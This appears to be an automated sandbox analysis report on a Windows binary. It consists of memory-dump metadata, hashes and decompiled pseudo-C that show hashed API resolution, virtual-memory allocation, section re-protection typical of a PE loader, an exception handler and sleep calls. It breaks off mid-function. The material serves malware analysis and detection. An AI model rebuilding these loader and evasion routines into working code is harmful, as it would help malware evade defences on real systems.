0x73330dce
0x73330dda
0x73330ddf
0x73330de1
0x00000000
0x00000000
0x73330e2f
0x73330e30
0x73330e33
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x73330e33
0x73330de3
0x73330de7
0x73330dee
0x73330def
0x73330def
0x73330dca
0x73330db9
0x73330d92
0x73330d54
0x73330913
0x73330913
0x73330913
0x73330918
0x7333091e
0x7333091e
0x00000000
0x73330918
0x7333090d
0x733308ad
0x7333082b
0x7333082b
0x7333082c
0x7333082d
0x7333082d
0x73330ceb
0x73330ceb
0x73330cf5
0x73330cf5
0x00000000

APIs

GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,D0443458,D0443458), ref: 733308FA
GetSystemInfo.KERNELBASE(?,4BCC7CBA,4BCC7CBA,?,?,F3453DD0,?,?,DB1D9B48,?,?,05411B30,00000000,80000002,00000000,-000000FC), ref: 73330CBC
GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,00000000,D0443458,D0443458,00000000,D0443458,D0443458), ref: 73330D50

Memory Dump Source

Source File: 00000002.00000002.617918728.0000000073321000.00000020.00020000.sdmp, Offset: 73320000, based on PE: true

Associated: 00000002.00000002.617906797.0000000073320000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617950082.000000007333A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617974649.000000007333D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.618004135.000000007333F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken$InfoSystem
String ID:
API String ID: 298373132-0
Opcode ID: 29534d0d6c43d7d8c1256035184f167d01d985efe4942cb9bf9964ecb2d9036a
Instruction ID: 3252396897271be0cd3de01d2a7e59e6c3ca17a9e54589a62e0cc0601ba18d93
Opcode Fuzzy Hash: 29534d0d6c43d7d8c1256035184f167d01d985efe4942cb9bf9964ecb2d9036a
Instruction Fuzzy Hash: 0722BF70A08345AFE732DB24C840BAB77A9AF82714F94C91DE4979F1A1DB34D846CB53

Uniqueness

Uniqueness Score: -1.00%

Function 73321494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Download Yara Rule

C-Code - Quality: 31%

			E73321494(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v40;
				intOrPtr _v60;
				void* _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				void* _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				void* __ebp;
				void* _t282;
				intOrPtr* _t310;
				intOrPtr* _t318;
				intOrPtr* _t434;
				intOrPtr* _t480;
				void* _t481;

				_t481 = __eflags;
				_t480 =  &_v60;
				_v40 = __ecx;
				_v76 = 0;
				E7332F620( &_v72, 0);
				_v60 = 0x22dc1034;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x18], xmm0");
				E7332F8C4( &_v76, E7332F568( &_v76) + 0x10);
				E7332F558( &_v80, E7332F568( &_v80) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v88 = _v88 + 1;
				_t325 =  &_v84;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v84 + 0x10)) = 0x853cdd04;
				asm("movq [ecx+0x18], xmm0");
				E7332F8C4( &_v84, E7332F568(_t325) + 0x10);
				E7332F558( &_v88, E7332F568( &_v88) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v96 = _v96 + 1;
				_t329 =  &_v92;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v92 + 0x10)) = 0xb162dc4e;
				asm("movq [ecx+0x18], xmm0");
				E7332F8C4( &_v92, E7332F568(_t329) + 0x10);
				E7332F558( &_v96, E7332F568( &_v96) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v104 = _v104 + 1;
				_t333 =  &_v100;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v100 + 0x10)) = 0xc15ccc53;
				asm("movq [ecx+0x18], xmm0");
				E7332F8C4( &_v100, E7332F568(_t333) + 0x10);
				E7332F558( &_v104, E7332F568( &_v104) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v112 = _v112 + 1;
				_t337 =  &_v108;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v108 + 0x10)) = 0xc8fc2de6;
				asm("movq [ecx+0x18], xmm0");
				E7332F8C4( &_v108, E7332F568(_t337) + 0x10);
				E7332F558( &_v112, E7332F568( &_v112) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v120 = _v120 + 1;
				_t341 =  &_v116;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v116 + 0x10)) = 0x7d07f92f;
				asm("movq [ecx+0x18], xmm0");
				E7332F8C4( &_v116, E7332F568(_t341) + 0x10);
				E7332F558( &_v120, E7332F568( &_v120) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v128 = _v128 + 1;
				_t345 =  &_v124;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v124 + 0x10)) = 0xfc7fa539;
				asm("movq [ecx+0x18], xmm0");
				E7332F8C4( &_v124, E7332F568(_t345) + 0x10);
				E7332F558( &_v128, E7332F568( &_v128) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v136 = _v136 + 1;
				_t349 =  &_v132;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v132 + 0x10)) = 0x4145240a;
				asm("movq [ecx+0x18], xmm0");
				E7332F8C4( &_v132, E7332F568(_t349) + 0x10);
				E7332F558( &_v136, E7332F568( &_v136) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v144 = _v144 + 1;
				_t353 =  &_v140;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v140 + 0x10)) = 0x2c2324e8;
				asm("movq [ecx+0x18], xmm0");
				E7332F8C4( &_v140, E7332F568(_t353) + 0x10);
				E7332F558( &_v144, E7332F568( &_v144) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v152 = _v152 + 1;
				_t357 =  &_v148;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v148 + 0x10)) = 0xf06b4c6b;
				asm("movq [ecx+0x18], xmm0");
				E7332F8C4( &_v148, E7332F568(_t357) + 0x10);
				E7332F558( &_v152, E7332F568( &_v152) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v160 = _v160 + 1;
				_t361 =  &_v156;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v156 + 0x10)) = 0xa54975b2;
				asm("movq [ecx+0x18], xmm0");
				E7332F8C4( &_v156, E7332F568(_t361) + 0x10);
				E7332F558( &_v160, E7332F568( &_v160) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v168 = _v168 + 1;
				_t365 =  &_v164;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v164 + 0x10)) = 0x563e1998;
				asm("movq [ecx+0x18], xmm0");
				E7332F8C4( &_v164, E7332F568(_t365) + 0x10);
				E7332F558( &_v168, E7332F568( &_v168) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v176 = _v176 + 1;
				_t369 =  &_v172;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v172 + 0x10)) = 0xd926c223;
				asm("movq [ecx+0x18], xmm0");
				E7332F8C4( &_v172, E7332F568(_t369) + 0x10);
				E7332F558( &_v176, E7332F568( &_v176) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v184 = _v184 + 1;
				_t373 =  &_v180;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v180 + 0x10)) = 0x80febacc;
				asm("movq [ecx+0x18], xmm0");
				E7332F8C4( &_v180, E7332F568(_t373) + 0x10);
				E7332F558( &_v184, E7332F568( &_v184) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v192 = _v192 + 1;
				_t377 =  &_v188;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v188 + 0x10)) = 0x98595b64;
				asm("movq [ecx+0x18], xmm0");
				E7332F8C4( &_v188, E7332F568(_t377) + 0x10);
				E7332F558( &_v192, E7332F568( &_v192) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v200 = _v200 + 1;
				_t381 =  &_v196;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v196 + 0x10)) = 0x8e3b5f9c;
				asm("movq [ecx+0x18], xmm0");
				E7332F8C4( &_v196, E7332F568(_t381) + 0x10);
				E7332F558( &_v200, E7332F568( &_v200) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v208 = _v208 + 1;
				_t385 =  &_v204;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v204 + 0x10)) = 0x9b42cb07;
				asm("movq [ecx+0x18], xmm0");
				E7332F8C4( &_v204, E7332F568(_t385) + 0x10);
				E7332F558( &_v208, E7332F568( &_v208) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t434 = _t480;
				 *_t434 =  *_t434 + 1;
				E7333413C(0xa5eabdf8, _t434);
				E7332F558( &_v212, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x450], xmm0");
				E7332F558( &_v216, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x458], xmm0");
				E7332F558( &_v220, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x460], xmm0");
				E7332F558( &_v224, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x468], xmm0");
				E7332F558( &_v228, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x470], xmm0");
				E7332F558( &_v232, 0x60);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x478], xmm0");
				E7332F558( &_v236, 0x70);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x480], xmm0");
				E7332F558( &_v240, 0x80);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x488], xmm0");
				E7332F558( &_v244, 0x90);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x490], xmm0");
				E7332F558( &_v248, 0xa0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x498], xmm0");
				E7332F558( &_v252, 0xb0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a0], xmm0");
				E7332F558( &_v256, 0xc0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a8], xmm0");
				E7332F558( &_v260, 0xd0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b0], xmm0");
				E7332F558( &_v264, 0xe0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b8], xmm0");
				E7332F558( &_v268, 0xf0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c0], xmm0");
				E7332F558( &_v272, 0x100);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c8], xmm0");
				_t282 = E7332F558( &_v276, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp], xmm0");
				_v252 = E73321D2C(_v248, _t434, _t481, _t282, _t282);
				_t318 = _t434;
				E7332B338( &_v248, _v256, _t481, _v252, _t318);
				E7332F8DC( &_v296, _t481);
				_v300 = 0;
				_t410 =  &_v296;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v296 + 0x10)) = 0xfb42c037;
				asm("movq [ecx+0x18], xmm0");
				E7332F8C4( &_v296, E7332F568(_t410) + 0x10);
				E7332F558( &_v300, E7332F568( &_v300) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v308 = _v308 + 1;
				_t414 =  &_v304;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v304 + 0x10)) = 0x7082aaf3;
				asm("movq [ecx+0x18], xmm0");
				E7332F8C4( &_v304, E7332F568(_t414) + 0x10);
				E7332F558( &_v308, E7332F568( &_v308) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v316 = _v316 + 1;
				_t418 =  &_v312;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v312 + 0x10)) = 0x1eeb5e35;
				asm("movq [ecx+0x18], xmm0");
				E7332F8C4( &_v312, E7332F568(_t418) + 0x10);
				E7332F558( &_v316, E7332F568( &_v316) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v324 = _v324 + 1;
				_t422 =  &_v320;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v320 + 0x10)) = 0xe856fc47;
				asm("movq [ecx+0x18], xmm0");
				E7332F8C4( &_v320, E7332F568(_t422) + 0x10);
				E7332F558( &_v324, E7332F568( &_v324) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t480 =  *_t480 + 1;
				_t310 = _t480;
				_push(_t310);
				_push(_t318);
				_push(_v292);
				_t154 = _t310 + 0x2c; // 0x2c
				E7332BAB8(_t154,  *_t480);
				E7332F558( &_v340, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d8], xmm0"); // executed
				E7332F558( &_v344, 0x10); // executed
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e0], xmm0");
				E7332F558( &_v348, "true");
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d0], xmm0");
				E7332F558( &_v352, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e8], xmm0");
				E7332F6F0( &_v316);
				return E7332F6F0( &_v356);
			}

0x73321494
0x73321498
0x7332149d
0x733214a3
0x733214ab
0x733214b0
0x733214bc
0x733214c0
0x733214d2
0x733214e8
0x733214f3
0x733214f4
0x733214f5
0x733214f6
0x733214f7
0x733214fa
0x733214fe
0x73321502
0x73321509
0x7332151b
0x73321531
0x7332153c
0x7332153d
0x7332153e
0x7332153f
0x73321540
0x73321543
0x73321547
0x7332154b
0x73321552
0x73321564
0x7332157a
0x73321585
0x73321586
0x73321587
0x73321588
0x73321589
0x7332158c
0x73321590
0x73321594
0x7332159b
0x733215ad
0x733215c3
0x733215ce
0x733215cf
0x733215d0
0x733215d1
0x733215d2
0x733215d5
0x733215d9
0x733215dd
0x733215e4
0x733215f6
0x7332160c
0x73321617
0x73321618
0x73321619
0x7332161a
0x7332161b
0x7332161e
0x73321622
0x73321626
0x7332162d
0x7332163f
0x73321655
0x73321660
0x73321661
0x73321662
0x73321663
0x73321664
0x73321667
0x7332166b
0x7332166f
0x73321676
0x73321688
0x7332169e
0x733216a9
0x733216aa
0x733216ab
0x733216ac
0x733216ad
0x733216b0
0x733216b4
0x733216b8
0x733216bf
0x733216d1
0x733216e7
0x733216f2
0x733216f3
0x733216f4
0x733216f5
0x733216f6
0x733216f9
0x733216fd
0x73321701
0x73321708
0x7332171a
0x73321730
0x7332173b
0x7332173c
0x7332173d
0x7332173e
0x7332173f
0x73321742
0x73321746
0x7332174a
0x73321751
0x73321763
0x73321779
0x73321784
0x73321785
0x73321786
0x73321787
0x73321788
0x7332178b
0x7332178f
0x73321793
0x7332179a
0x733217ac
0x733217c2
0x733217cd
0x733217ce
0x733217cf
0x733217d0
0x733217d1
0x733217d4
0x733217d8
0x733217dc
0x733217e3
0x733217f5
0x7332180b
0x73321816
0x73321817
0x73321818
0x73321819
0x7332181a
0x7332181d
0x73321821
0x73321825
0x7332182c
0x7332183e
0x73321854
0x7332185f
0x73321860
0x73321861
0x73321862
0x73321863
0x73321866
0x7332186a
0x7332186e
0x73321875
0x73321887
0x7332189d
0x733218a8
0x733218a9
0x733218aa
0x733218ab
0x733218ac
0x733218af
0x733218b3
0x733218b7
0x733218be
0x733218d0
0x733218e6
0x733218f1
0x733218f2
0x733218f3
0x733218f4
0x733218f5
0x733218f8
0x733218fc
0x73321900
0x73321907
0x73321919
0x7332192f
0x7332193a
0x7332193b
0x7332193c
0x7332193d
0x7332193e
0x73321941
0x73321945
0x73321949
0x73321950
0x73321962
0x73321978
0x73321983
0x73321984
0x73321985
0x73321986
0x7332198c
0x7332198f
0x73321991
0x7332199c
0x733219a3
0x733219ac
0x733219b4
0x733219bb
0x733219c4
0x733219cc
0x733219d3
0x733219dc
0x733219e4
0x733219eb
0x733219f4
0x733219fc
0x73321a03
0x73321a0c
0x73321a14
0x73321a1b
0x73321a24
0x73321a2c
0x73321a36
0x73321a3f
0x73321a47
0x73321a51
0x73321a5a
0x73321a62
0x73321a6c
0x73321a75
0x73321a7d
0x73321a87
0x73321a90
0x73321a98
0x73321aa2
0x73321aab
0x73321ab3
0x73321abd
0x73321ac6
0x73321ace
0x73321ad8
0x73321ae1
0x73321ae9
0x73321af3
0x73321afc
0x73321b04
0x73321b0e
0x73321b17
0x73321b1f
0x73321b26
0x73321b2f
0x73321b37
0x73321b3e
0x73321b43
0x73321b51
0x73321b55
0x73321b64
0x73321b6d
0x73321b72
0x73321b79
0x73321b7d
0x73321b81
0x73321b88
0x73321b9a
0x73321bb0
0x73321bbb
0x73321bbc
0x73321bbd
0x73321bbe
0x73321bbf
0x73321bc2
0x73321bc6
0x73321bca
0x73321bd1
0x73321be3
0x73321bf9
0x73321c04
0x73321c05
0x73321c06
0x73321c07
0x73321c08
0x73321c0b
0x73321c0f
0x73321c13
0x73321c1a
0x73321c2c
0x73321c42
0x73321c4d
0x73321c4e
0x73321c4f
0x73321c50
0x73321c51
0x73321c54
0x73321c58
0x73321c5c
0x73321c63
0x73321c75
0x73321c8b
0x73321c96
0x73321c97
0x73321c98
0x73321c99
0x73321c9a
0x73321c9d
0x73321ca0
0x73321ca1
0x73321ca2
0x73321ca9
0x73321cac
0x73321cb7
0x73321cbe
0x73321cc7
0x73321ccf
0x73321cd6
0x73321cdf
0x73321ce7
0x73321cee
0x73321cf7
0x73321cff
0x73321d04
0x73321d0d
0x73321d15
0x73321d2a

Strings

$#,, xrefs: 73321701

Memory Dump Source

Source File: 00000002.00000002.617918728.0000000073321000.00000020.00020000.sdmp, Offset: 73320000, based on PE: true

Associated: 00000002.00000002.617906797.0000000073320000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617950082.000000007333A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617974649.000000007333D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.618004135.000000007333F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: $#,
API String ID: 0-2557146312
Opcode ID: faf8bf4f383b9672c02f2385df81a17d360748bba604cd6ce172ee8b62593912
Instruction ID: 840968173410ef965d15d7a846578e91b121f24dde9c55972dd057911fa4fdef
Opcode Fuzzy Hash: faf8bf4f383b9672c02f2385df81a17d360748bba604cd6ce172ee8b62593912
Instruction Fuzzy Hash: 6B3264728057059FD715DF20C851AAFBBB0EFA2306F20471DB4992A1A1FF71EA87CA51

Uniqueness

Uniqueness Score: -1.00%

Function 7333218C, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E7333218C(void* __ecx, intOrPtr __edx, void* __esi) {
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr* _t5;
				intOrPtr _t11;
				intOrPtr* _t13;
				intOrPtr* _t15;

				_t11 = __edx;
				if(__ecx == 0) {
					 *_t15 = 0;
					_v4 = 0;
				} else {
					 *_t15 = E73333A34(0xffffd8f0, 0xffffffff, __ecx, 0);
					_v20 = _t11;
				}
				_t5 = E73332F94(0xa5eabdf8, 0xd48281c0, 0xa5eabdf8, 0xa5eabdf8);
				_t13 = _t5;
				if(_t13 != 0) {
					_t5 =  *_t13(0, _t15); // executed
				}
				return _t5;
			}

0x7333218c
0x73332190
0x733321ac
0x733321af
0x73332192
0x733321a1
0x733321a4
0x733321a4
0x733321bf
0x733321c4
0x733321c8
0x733321d0
0x733321d0
0x733321d4

APIs

NtDelayExecution.NTDLL(00000000,00000000,A5EABDF8,A5EABDF8,FFFFFFFF,FFFFFFFF,733235C3,00000000,00000000,?), ref: 733321D0

Memory Dump Source

Source File: 00000002.00000002.617918728.0000000073321000.00000020.00020000.sdmp, Offset: 73320000, based on PE: true

Associated: 00000002.00000002.617906797.0000000073320000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617950082.000000007333A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617974649.000000007333D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.618004135.000000007333F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: e340f986def6f26baa2f9c03e956c8e364c5e46def001a9482b730e7c6c19888
Instruction ID: 87d75439cf867c78a0af291cf854ce4aebcc3d81bdc4e47c54268166d2e895dc
Opcode Fuzzy Hash: e340f986def6f26baa2f9c03e956c8e364c5e46def001a9482b730e7c6c19888
Instruction Fuzzy Hash: A1E09BB090E3416EFB5497298E00F3B7AE89F81221FA0C61CB555D62C4E630D4414722

Uniqueness

Uniqueness Score: -1.00%

Function 73332790, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E73332790(void* __ecx, long __edx, void* __esi, long _a4, long _a8, void* _a12) {
				long _v4;
				void* _t8;
				long _t10;
				PVOID* _t19;

				_v4 = __edx;
				 *_t19 = __ecx;
				if(E73332F94(0xa5eabdf8, 0xc15ccc53, 0xa5eabdf8, 0xa5eabdf8) == 0) {
					L3:
					_t8 =  *_t19;
				} else {
					_t10 = NtAllocateVirtualMemory(_a12, _t19, 0,  &_v4, _a4, _a8); // executed
					if(_t10 == 0) {
						goto L3;
					} else {
						_t8 = 0;
					}
				}
				return _t8;
			}

0x73332797
0x733327a0
0x733327ae
0x733327d1
0x733327d1
0x733327b0
0x733327c7
0x733327cb
0x00000000
0x733327cd
0x733327cd
0x733327cd
0x733327cb
0x733327d6

APIs

NtAllocateVirtualMemory.NTDLL(A5EABDF8,?,00000000,22DC1034,00000004,00000004,A5EABDF8,A5EABDF8,?,?,73338852,00003000,00000004,000000FF,A5EABDF8,22DC1034), ref: 733327C7

Memory Dump Source

Source File: 00000002.00000002.617918728.0000000073321000.00000020.00020000.sdmp, Offset: 73320000, based on PE: true

Associated: 00000002.00000002.617906797.0000000073320000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617950082.000000007333A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617974649.000000007333D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.618004135.000000007333F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: fcb83ea506db4d533a488a570b7e2b2bbaaaa8a6521a140e351edaccfb331de1
Instruction ID: c4c461a78b19d09f05edf78e4edbe1eeeb5658593e8c405a01c4f35b9e43d86e
Opcode Fuzzy Hash: fcb83ea506db4d533a488a570b7e2b2bbaaaa8a6521a140e351edaccfb331de1
Instruction Fuzzy Hash: 60E0397120D746AFEB19CA25CC14E6BBBFDEF89600F548C1DB496C6550E770D8409722

Uniqueness

Uniqueness Score: -1.00%

Function 73333060, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E73333060(intOrPtr* __ecx) {
				void* _t1;

				_push(E733333D8);
				_push(1); // executed
				_t1 =  *__ecx(); // executed
				return _t1;
			}

0x73333060
0x73333065
0x73333067
0x73333069

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,733333D8,73333050,A5EABDF8,A5EABDF8,?,73322530,00000001), ref: 73333067

Memory Dump Source

Source File: 00000002.00000002.617918728.0000000073321000.00000020.00020000.sdmp, Offset: 73320000, based on PE: true

Associated: 00000002.00000002.617906797.0000000073320000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617950082.000000007333A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617974649.000000007333D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.618004135.000000007333F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: 4d34cb543621c48ead8c09cf3e2dda7c0ac15b7d84501c71712d028f13444798
Instruction ID: a6614405cc2a2f0ef98b8c45444f5dfa2d7132eb8e19fd932a919c6e0ab52292
Opcode Fuzzy Hash: 4d34cb543621c48ead8c09cf3e2dda7c0ac15b7d84501c71712d028f13444798
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 025D2213, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E025D2213(long __ebx, long __edi, void* __esi, intOrPtr* _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _v72;
				char* _v76;
				int _v80;
				long _v84;
				long _v88;
				DWORD* _v92;
				intOrPtr _v96;
				int _v100;
				intOrPtr* _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				void* _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				char* _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				int _v168;
				char* _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				char _v184;
				intOrPtr* _t136;
				int _t143;
				int _t151;
				int _t155;
				intOrPtr _t170;
				int _t177;
				void* _t226;
				intOrPtr _t229;
				intOrPtr _t234;
				void* _t236;
				intOrPtr* _t240;
				intOrPtr _t247;
				intOrPtr _t251;
				DWORD* _t264;
				void* _t268;
				intOrPtr* _t271;
				intOrPtr* _t272;

				_t136 = _a4;
				_v20 = 0;
				_t236 =  *((intOrPtr*)(_t136 + 0x40));
				 *0x25d4418 = 1;
				asm("movaps xmm0, [0x25d3010]");
				asm("movups [0x25d4428], xmm0");
				_v48 = _t136;
				_v52 =  *((intOrPtr*)(_t136 + 0x64));
				_v56 =  *((intOrPtr*)(_v48 + 8));
				_v184 = _t236;
				_v60 =  *((intOrPtr*)(_v48 + 0x50));
				_v180 = _v52;
				_v176 = 4;
				_v172 =  &_v20;
				_v64 =  *((intOrPtr*)(_t136 + 0x60));
				_v68 = 4;
				_v72 = _t236;
				_v76 =  &_v20;
				_t143 = VirtualProtect(__esi, __edi, __ebx, _t264); // executed
				_v80 = _t143;
				_v184 = _v72;
				_v180 = 0;
				_v176 =  *((intOrPtr*)(_v48 + 0x64));
				_v84 = 0x400;
				_v88 = 2;
				_v92 =  &_v20;
				_v96 = 0;
				E025D2569();
				E025D1D28(_v72,  *((intOrPtr*)(_v48 + 0xc)), _v56);
				E025D2569( *((intOrPtr*)(_v48 + 0xc)), 0, _v56);
				_t151 = VirtualProtect(_v72, 0x400, 2, _v92); // executed
				_t271 = _t268 - 0x88;
				_t226 = _v72;
				_t251 =  *((intOrPtr*)(_t226 + 0x3c));
				_v100 = _t151;
				_v104 = _v72 + 0x3c;
				_v108 = _t226;
				_v112 = _t251;
				if(_t251 != 0) {
					_v108 = _v72 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v144 = _v108;
				if(_v60 != 0) {
					_v148 = 0;
					_v152 = _v144 + 0x18 + ( *(_v144 + 0x14) & 0x0000ffff);
					while(1) {
						_t170 = _v152;
						_v160 = _t170;
						_t247 = _v160;
						_v184 = _v72 +  *((intOrPtr*)(_t247 + 0xc));
						_v180 =  *((intOrPtr*)(_t247 + 8));
						_v176 =  *((intOrPtr*)(0x25d4418 + (( *(_t170 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t170 + 0x24) >> 0x1f << 3) + (( *(_t170 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
						_v172 =  &_v20;
						_v164 = _v148;
						_t177 = VirtualProtect(??, ??, ??, ??); // executed
						_t271 = _t271 - 0x10;
						_t234 = _v164 + 1;
						_v168 = _t177;
						_v148 = _t234;
						_v152 = _v160 + 0x28;
